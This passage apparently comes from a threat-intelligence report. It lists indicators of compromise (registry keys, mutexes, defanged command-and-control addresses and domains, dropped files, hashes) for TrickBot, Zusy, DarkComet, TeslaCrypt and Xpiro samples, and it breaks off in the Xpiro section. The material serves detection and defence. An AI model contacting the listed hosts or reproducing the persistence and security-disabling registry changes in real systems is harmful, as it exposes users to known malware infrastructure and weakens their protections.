Secure Malware Analytics | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection

Secure Endpoint: [screenshot not reproduced in this text version]
Secure Malware Analytics: [screenshot not reproduced in this text version]
MITRE ATT&CK: [technique map not reproduced in this text version]

Win.Dropper.TrickBot-9960840-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 36 samples
Registry Key | Value Name | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\USERDS |  | 36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS | 4334c972 | 36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS | 2d17e659 | 36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent3 | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent5 | 5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent9 | 4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent6 | 4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent7 | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent2 | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent1 | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent8 | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent0 | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | IntelPowerAgent4 | 2

Mutex | Occurrences
98b59d0b000000cc | 36
98b59d0b00000120 | 36
Global\{2d17e659d34601689591} | 36
98b59d0b00000174 | 36
98b59d0b00000150 | 36
98b59d0b00000158 | 36
98b59d0b000001ac | 35
98b59d0b00000308 | 35
98b59d0b0000043c | 35
98b59d0b000004b4 | 35
98b59d0b000001bc | 35
98b59d0b000002ec | 35
98b59d0b000001f0 | 35
98b59d0b000001c4 | 35
98b59d0b0000021c | 35
98b59d0b0000025c | 35
98b59d0b00000294 | 35
98b59d0b00000320 | 35
98b59d0b000003d4 | 35
98b59d0b000003f8 | 35
98b59d0b000004dc | 35
98b59d0b0000060c | 8
98b59d0b000005cc | 8
98b59d0b000004f8 | 8
98b59d0b00000614 | 7
*See JSON for more IOCs

IP Address contacted by malware (does not indicate maliciousness) | Occurrences
209[.]197[.]3[.]8 | 11
72[.]21[.]81[.]240 | 7
69[.]164[.]46[.]0 | 6
8[.]253[.]154[.]236/31 | 3
23[.]46[.]150[.]81 | 2
23[.]46[.]150[.]58 | 2
8[.]253[.]141[.]249 | 1
8[.]253[.]38[.]248 | 1
8[.]253[.]140[.]118 | 1
23[.]46[.]150[.]43 | 1
8[.]247[.]119[.]126 | 1

Domain Name contacted by malware (does not indicate maliciousness) | Occurrences
download[.]windowsupdate[.]com | 36
adtejoyo1377[.]tk | 36

File or directory created | Occurrences
%ProgramData%\c7150968.exe | 1
%LOCALAPPDATA%\gusEBBF.tmp.bat | 1
%ProgramData%\ba886437.exe | 1
%HOMEPATH%\jfpDCC6.tmp.bat | 1
%ProgramData%\63b007ed.exe | 1
%HOMEPATH%\dtaE10F.tmp.bat | 1
%ProgramData%\545ba94b.exe | 1
%HOMEPATH%\hcv6907.tmp.bat | 1
%ProgramData%\7afae1e8.exe | 1
%HOMEPATH%\greA7E2.tmp.bat | 1
%ProgramData%\9421c9aa.exe | 1
%APPDATA%\vqpA923.tmp.bat | 1
%ProgramData%\f779fb59.exe | 1
%ProgramData%\xywA29.tmp.bat | 1
%ProgramData%\940d0a1e.exe | 1
%HOMEPATH%\jawD8CB.tmp.bat | 1
%ProgramData%\a37667ce.exe | 1
%HOMEPATH%\lkyB72F.tmp.bat | 1
%ProgramData%\edcfad58.exe | 1
%HOMEPATH%\pvf22C5.tmp.bat | 1
%ProgramData%\182b8517.exe | 1
%LOCALAPPDATA%\qsw15A4.tmp.bat | 1
%ProgramData%\a3a20124.exe | 1
%HOMEPATH%\xqh15A4.tmp.bat | 1
%ProgramData%\a116e074.exe | 1
*See JSON for more IOCs

File Hashes

007a16c9f6908085a2d65e991ae691f41e7ceab17653200669b4286af82e8c12 017306c686a5a81630e746b9518106fd5e54b410b50a61f43cba7a3850b1fec8 024d73837dea32792852294b951dcb246c56442ebde4643cef6733f411f581b6 0284c0aff10ff3ca7e6078f3d8191fc9c4db42fbfb912a8cefabc937c1eca87d 02df9ec5bfb9e1bb613b5ee7d4a518bccc9f87580182f26d6e5d5a643036e3a1 03226228480f9e9d87a0370428d337023226314bd9447efccdbc03bb672ec81b 0337b9f06cda7d7a6e96ce2a29e0f004fb6df49d3b82d294a17a13604e754f86 03a89b1af244c7d20db8498d9284c20deea9462fb15db2f89b4c59a9be47c2f0 04432d06396fac85167c0a9dadf206dc50ea8527c29b943b77f192e45dbce22d 04679de514d8e3902341b314e324e6f75ba536d09da05e99958dc5b4a689de42 049f0322736b0abeec70630b9efbbd40d9a0916ce359a5a8168165d25a76e48f 04e819e635fc974afd4ee533b478841ba581ddcff254034fdbfea6522939ef5f 05b51b8179992a7e21259d9eacdaf8b1115e51056ec0104daddda5a0810f7126 0734ea55ac016a1e6b6ac40837883a684656eec9ce857351c9f99d3c965d6501 07e4ebd0b135dbfcf1e7d2b60386c9b52fa5d154d072a5689eb3a7a2b15112d6 08da477f7c363ddbc11224260717cf6f7f48e849cff403e25559529029b8fdf4 08e9ccb010aceac1ea0c0fbb41e58c8e2552b30de500bf43e298a645f5acedf7 097f9d7400b8a8c8bf5aa5339bf18359148a533f9136cd9b6279623e4db293d7 0bde820541632a300070601291eb1c478b9d09da2b405f740d6fe92b290a45de 0be2e49c02aa297d158bd5fe213a96584455fb4cea7c24dd100b9922df2a45c5 0bf64ebc68956ea9d73858f32530c20fab4243fb09320adfd500fb94842a9888 0c29c2763f311604136a06a99fa76ed09411572cd796021b60c66806e6c8e5a9 0c6b997f98a1e58caf5a16a90317d2cb1d2474ac5c5926f26fa2b14a9299638a 0d30d3c9cf63898bb2e970ec5a54dfe868fc5f519fd6b283bd00a2d22a01a653 0da6c492cc755852c07bf7511b774e2527dce42be420f602e9445f1bb760ad33
*See JSON for more IOCs

Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection

Secure Endpoint: [screenshot not reproduced in this text version]
Secure Malware Analytics: [screenshot not reproduced in this text version]
MITRE ATT&CK: [technique map not reproduced in this text version]

Win.Trojan.Zusy-9960880-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Key | Value Name | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH |  | 12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | MarkTime | 12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | Description | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | Type | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | Start | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | ErrorControl | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | ImagePath | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | DisplayName | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | WOW64 | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | ObjectName | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | FailureActions | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU |  | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU | MarkTime | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | Group | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH | InstallTime | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF | Description | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF | Type | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF | Start | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF | ErrorControl | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF | DisplayName | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF | WOW64 | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF | ObjectName | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF | FailureActions | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU | Description | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU | Type | 1

Mutex | Occurrences
127.0.0.1:8000:Cdefgh | 3
112.74.89.58:44366:Cdefgh | 3
112.74.89.58:42150:Cdefgh | 1
47.100.137.128:8001:Pqrstu | 1
22.23.24.56:8001:Pqrstu | 1
hz122.f3322.org:8001:Cdefgh | 1
112.74.89.58:35807:Cdefgh | 1
112.74.89.58:46308:Cdefgh | 1
101.33.196.136:3389:Cdefgh | 1
127.0.0.1:8001:Cdefgh | 1
183.28.28.43:8001:Abcdef | 1

IP Address contacted by malware (does not indicate maliciousness) | Occurrences
112[.]74[.]89[.]58 | 6
22[.]23[.]24[.]56 | 1
47[.]100[.]137[.]128 | 1
101[.]33[.]196[.]136 | 1
183[.]28[.]28[.]43 | 1

Domain Name contacted by malware (does not indicate maliciousness) | Occurrences
hz122[.]f3322[.]org | 1

File or directory created | Occurrences
%SystemRoot%\svchost.exe | 4

File Hashes

04fa031e5d2d86f8dbe0d3b95d67ea774448df4613e8acce79f0c9a30ef041bc 2444b744b5c06e9410ee5c3baa807569fde44c5092192428de935e03d25b1edb 466ca0805173034a7b12a5ffce104bbe5ed312e7441abdb98849ae4103150d04 5a755f07d3b90ac5a2041fd04fd764c40882dd20b50f91fddbc10b8c6341591d 5b53262a14fe1dcd42d670b0488d0de11aeb7cfa84e36acb4eec0c13b5fd2d73 5ca6b22c6e7de5f0b9437970f1f9360ad4f3a74f964eb319080e347c27c6dff9 6ea5fdaa95dbe09ccbc474ba4fc9fbe796e79c02d2b4f65f223feda5643f5400 86bd70bc7bb74d3d4991b0f1c7e15ddef1d09695b3940c5fb015f2d00ce5f558 b9b344bd7005b233cbb85395f61c309938fe70e2f8a8d0b2c24441ba074f9ca5 bea6c7b4117eb1f894d830c77ddf6d4424bccb6043d0f43c257522d253321c3e c0a8a6e606e46a970cefe81f269ec6aec2a538830c2f7e03cf0eac55b135a59a c968ae3cfbbd89673b49f6bfd474eea846bdb1e2e3a7c5376dbcda5290d445ed dfc315d962da82d84b54683a849edf4e7b16bb136dbc2eb1198d35e528920103 ec6cb8ff27e33d7e69ce02885baa9c08fd5a03349a16a52590353a4ec364c464 f240b80b34fa480dc7236ddecb5c326e719a094e49df5a6f2070712650553066 fd0e616e5ebb9075c44bb6772cf8b2c46801fafdb0716636850dc2ec0fe06f8c

Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection

Secure Endpoint: [screenshot not reproduced in this text version]
Secure Malware Analytics: [screenshot not reproduced in this text version]
MITRE ATT&CK: [technique map not reproduced in this text version]

Win.Dropper.DarkComet-9961766-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 33 samples
Registry Key | Value Name | Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC |  | 29
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | Windows Debugger | 24
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON | UserInit | 23
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | LanguageList | 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | MicroUpdate | 11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | svchost.exe | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM | EnableLUA | 5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM |  | 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE | EnableFirewall | 4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE | DisableNotifications | 4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER | AntiVirusDisableNotify | 4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM | DisableTaskMgr | 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER | UpdatesDisableNotify | 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC | Start | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM | DisableRegistryTools | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | rundll32 | 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN | NoControlPanel | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION |  | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN |  | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | Microsoft | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | Windows Updater | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | Update | 1

Mutex | Occurrences
DC_MUTEX-<random, matching [A-Z0-9]{7}> | 22
DCPERSFWBP | 18
DC_MUTEX-5DND8AT | 7

IP Address contacted by malware (does not indicate maliciousness) | Occurrences
99[.]229[.]175[.]244 | 1

Domain Name contacted by malware (does not indicate maliciousness) | Occurrences
pervert[.]no-ip[.]info | 7
pervert2[.]no-ip[.]info | 7
delvega[.]no-ip[.]org | 2
wp-enhanced[.]no-ip[.]org | 2
funstuff712[.]zapto[.]org | 2
fflazhhf1[.]no-ip[.]org | 1
darkcometss[.]no-ip[.]org | 1
not4umac[.]no-ip[.]biz | 1
sanderkidah[.]no-ip[.]org | 1
bobolobob[.]no-ip[.]biz | 1
hg-ma[.]zapto5[.]org | 1
corrosivegas2010[.]zapto[.]org | 1
profi555[.]no-ip[.]org | 1
hg-ma[.]zapto[.]org | 1
jugoboy1[.]zapto[.]org | 1
hg-ma[.]zapto1[.]org | 1
hg-ma[.]zapto2[.]org | 1
hg-ma[.]zapto3[.]org | 1
hg-ma[.]zapto4[.]org | 1
jackreapez[.]zapto[.]org | 1
magicmq[.]no-ip[.]org | 1
kenrickm[.]no-ip[.]org | 1
mrganja[.]no-ip[.]org | 1
cherubi[.]no-ip[.]org | 1

File or directory created | Occurrences
%APPDATA%\WinDbg | 30
%APPDATA%\WinDbg\windbg.exe | 29
%APPDATA%\dclogs | 28
\svchost.exe | 7
%TEMP%\uxcv9v | 7
%TEMP%\uxcv9v.vbs | 7
%HOMEPATH%\Documents\MSDCSC | 6
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe | 6
%TEMP%\MSDCSC | 5
%TEMP%\MSDCSC\msdcsc.exe | 5
%SystemRoot%\SysWOW64\MSDCSC | 3
%SystemRoot%\SysWOW64\MSDCSC\msdcsc.exe | 3
%TEMP%\tMMjnM | 1
%TEMP%\xMWbLz.vbs | 1
%TEMP%\tMMjnM.vbs | 1
%APPDATA%\WinDbg\msdnaa.exe | 1
%TEMP%\Mi0z67 | 1
%HOMEPATH%\Documents\Explorer\Iexplorer.exe | 1
%TEMP%\q7EVTk | 1
%TEMP%\mmsHyU | 1
%TEMP%\q7EVTk.vbs | 1
%TEMP%\mmsHyU.vbs | 1
%APPDATA%\WinUpd\WinUpdater.exe | 1
%TEMP%\alRnXV | 1
%TEMP%\alRnXV.vbs | 1
*See JSON for more IOCs

File Hashes

0153ea1e28f729d6604f422075202e48a599969c04c30e4a3056e3a308148eb3 050332edd1c7356a6e8a86471699135d90ba402d1f7ac0a27da39ccdb94ba0e8 07525015abc52c0820727bbfe3a29f62e1e5e0ca8af36ca8716ae5ea12e71a75 09fce07fb07b90dc54f5e72dd08d8677f62e948e6a0450e63f25cc6e22f99ff5 0a5710ed174fbee931562112147c3bf6cf8609a5f1674d0c878a6888548cb0c9 0db09a5cc0ff770b4024f14bf6b56b03c4ec599fe0499fc3a8d5da2625d93954 0f67c4df374d4e01f9838a7dc6ab174c0d8f4b5f2485b670f24c7fcdf65f3269 10f39ff02541b02857c11ca18a1cc745e075224ad510af7ad18b21dcb0d3cfa0 12449565aed227128301078ece7695cd6fbd8fb735e8f8b4238e08a1b181a651 13d377317be765d9d333e6a6d41bb83cffb606547dc308fefe0dcea87133b172 157be56d2b1cee72ad290957752e089cd39f39c51807c6791b25b875113758ab 15c65c639231d17726fa4a2c0cef2a7975a52f5d71ba8d7e4e3e1f053c066528 16cc7eabf5a54d8b376b6de32e2591902044a558ded0a527fcc0143e1686c4af 16e972675f3d1bd26aff1accdde7925e4cd5ba6d5f2a33826d3d75606a1bc955 173cae8d47a5d796b06fdd18c951003342ad08d0aee4be2823332df003b5673a 17dbbd57df81e29f2d19aba93c1626efe92bff713ad8b8e65b449e843aff54e8 19370c555e8e7ed5133ca6efa7acc98fc360983cc04193cc195ea0c8a0bf2931 1984c2439c1acacb9ec7c6468db48017d8c2aa4e2da5829d572bb6f5050e80cd 1b7a03db77e43e04badd95d28554df1f9e3d97197605af709df0387d3bd0c1e8 1b9f9491a6d98e3de499641caa8ac736f2c6f76e4ac8960170d89fea7026c69e 1bd9838e181acb88813cdea1d228b445e06b921bff3cece199f9551522eff27d 1cd35eff6c0963356162d68f5434b19728f2805db71b5c616ff534d2c961d093 1d25e1479054eea2355385f60a9ce320af2e5ff5ff1333bfabc72518f7337056 1f3c3ebac21a63328b72317246fb5731720e1d311cdb7928543e1c13e87994d3 2066531192b69556304df9a65266a2d2e5978ae8cec323b6860eb230fd2faa79
*See JSON for more IOCs

Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection

Secure Endpoint: [screenshot not reproduced in this text version]
Secure Malware Analytics: [screenshot not reproduced in this text version]
MITRE ATT&CK: [technique map not reproduced in this text version]

Win.Ransomware.TeslaCrypt-9960924-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Key | Value Name | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM | EnableLinkedConnections | 16
<HKU>\.DEFAULT\SOFTWARE\TRUEIMG |  | 16
<HKCU>\SOFTWARE\TRUEIMG |  | 16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 | CheckSetting | 16
<HKCU>\SOFTWARE\TRUEIMG | ID | 16
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> |  | 16
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> | data | 16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _lfia | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _hfnk | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _kcgt | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _ppqk | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _kaol | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _abtg | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _rpua | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _raet | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _kwxa | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _ojsf | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _kiyk | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _iykv | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _hpdk | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _htkc | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _fshu | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | _fanp | 1

Mutex | Occurrences
__xfghx__ | 16

IP Address contacted by malware (does not indicate maliciousness) | Occurrences
74[.]220[.]199[.]6 | 16
64[.]190[.]63[.]111 | 16

Domain Name contacted by malware (does not indicate maliciousness) | Occurrences
prodocument[.]co[.]uk | 16
marketathart[.]com | 16
joshsawyerdesign[.]com | 16
emmy2015[.]com | 16
nlhomegarden[.]com | 16
esbook[.]com | 16

File or directory created | Occurrences
%ProgramFiles%\7-Zip\Lang\lv.txt | 16
%ProgramFiles%\7-Zip\Lang\mk.txt | 16
%ProgramFiles%\7-Zip\Lang\mn.txt | 16
%ProgramFiles%\7-Zip\Lang\mng.txt | 16
%ProgramFiles%\7-Zip\Lang\mng2.txt | 16
%ProgramFiles%\7-Zip\Lang\mr.txt | 16
%ProgramFiles%\7-Zip\Lang\ms.txt | 16
%ProgramFiles%\7-Zip\Lang\nb.txt | 16
%ProgramFiles%\7-Zip\Lang\ne.txt | 16
%ProgramFiles%\7-Zip\Lang\nl.txt | 16
%ProgramFiles%\7-Zip\Lang\nn.txt | 16
%ProgramFiles%\7-Zip\Lang\pa-in.txt | 16
%ProgramFiles%\7-Zip\Lang\pl.txt | 16
%ProgramFiles%\7-Zip\Lang\ps.txt | 16
%ProgramFiles%\7-Zip\Lang\pt-br.txt | 16
%ProgramFiles%\7-Zip\Lang\pt.txt | 16
%ProgramFiles%\7-Zip\Lang\ro.txt | 16
%ProgramFiles%\7-Zip\Lang\ru.txt | 16
%ProgramFiles%\7-Zip\Lang\sa.txt | 16
%ProgramFiles%\7-Zip\Lang\si.txt | 16
%ProgramFiles%\7-Zip\Lang\sk.txt | 16
%ProgramFiles%\7-Zip\Lang\sl.txt | 16
%ProgramFiles%\7-Zip\Lang\sq.txt | 16
%ProgramFiles%\7-Zip\Lang\sr-spc.txt | 16
%ProgramFiles%\7-Zip\Lang\sr-spl.txt | 16
*See JSON for more IOCs

File Hashes

00e862ecba1e2a71769a67fc5c27499e00c5594f6b7ed4e4114c2fe1fb43492f 144c480ed69ac652c4eb4efa5b6038d7a68ed3bca67089997b4228e1c814f7c4 1b02123c913912f44a6ef1c3c4a5a008270d9d8e802e92b4baa259135f25dc21 22f322c8241b4860c066f5ae57115c58f373753e3d8c9bede4521e5a5ed85e65 35aeb94c99b948b122f3e4bd4298107ab15cb8bbdb11b533d32666dbb1455ae3 3ba05e043bf3148202f498dcddb6bd67680f76640aef2d08f9ae1272ff85e719 41cba3025ecc75863b7a836ee00fdf2bbc2df90dffb17541b5bb1c9fcb269bd1 9223631593b46b54450b76028a69ddd837d06cd7e9b3d8e3f7bd584a46af22bf b2713458d2c3ebd4b558f8c2ce19a90bd97095ca868fd499755bf1c9cbd0c388 bdf2c5fcf72e7d7870e81ffacdd01206ed98d2446a85c28e7eaf73e26d7a6eda be9fac828e64c19e0a3fbf3c4a752d5332b7c0b849556f5388645515a29538ee c00039c0454935a5079dc801ce4420457eb9964cbed8372b5aff5c60a45fa26c d540b31f009a4138b5d35735fa9976522f4d5ee9e6b8dbdbde479796ebc6d4c0 dba60ef1804b4d90d74a2988fe53f044d7619f469d0ba9660e5646a1a67439cd f1ab2d7ace4656b5f3770186d088ac0644482fe43f38fe2bdb9217744d0f58c1 ff6f821dc0526f3615b1a3c37b2b14094f53d05cb0a6a753cb257cb0bcde6898

Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection

Secure Endpoint: [screenshot not reproduced in this text version]
Secure Malware Analytics: [screenshot not reproduced in this text version]
MITRE ATT&CK: [technique map not reproduced in this text version]

Win.Virus.Xpiro-9960895-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Key | Value Name | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32 | Type | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64 | Type | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32 | Type | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32 | Start | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP | Type | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP | Start | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE | Type | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE | Start | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE | Type | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE | Start | 23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 |  | 23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 | EnableNotifications | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32 | Start | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64 | Start | 23
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE | AccumulatedWaitIdleTime | 23
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE | RootstoreDirty | 23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE | AccumulatedWaitIdleTime | 23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE | RootstoreDirty | 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC | Start | 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64 | Type | 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64 | Start | 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE | Type | 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE | Start | 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND | Start | 21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} |  | 18

Mutex | Occurrences
kkq-vx_mtx63 | 23
kkq-vx_mtx64 | 23
kkq-vx_mtx65 | 23
kkq-vx_mtx66 | 23
kkq-vx_mtx67 | 23
kkq-vx_mtx68 | 23
kkq-vx_mtx69 | 23
kkq-vx_mtx70 | 23
kkq-vx_mtx71 | 23
kkq-vx_mtx72 | 23
kkq-vx_mtx73 | 23
kkq-vx_mtx74 | 23
kkq-vx_mtx75 | 23
kkq-vx_mtx76 | 23
kkq-vx_mtx77 | 23
kkq-vx_mtx78 | 23
kkq-vx_mtx79 | 23
kkq-vx_mtx80 | 23
kkq-vx_mtx81 | 23
kkq-vx_mtx82 | 23
kkq-vx_mtx83 | 23
kkq-vx_mtx84 | 23
kkq-vx_mtx85 | 23
kkq-vx_mtx86 | 23
kkq-vx_mtx87 | 23
*See JSON for more IOCs

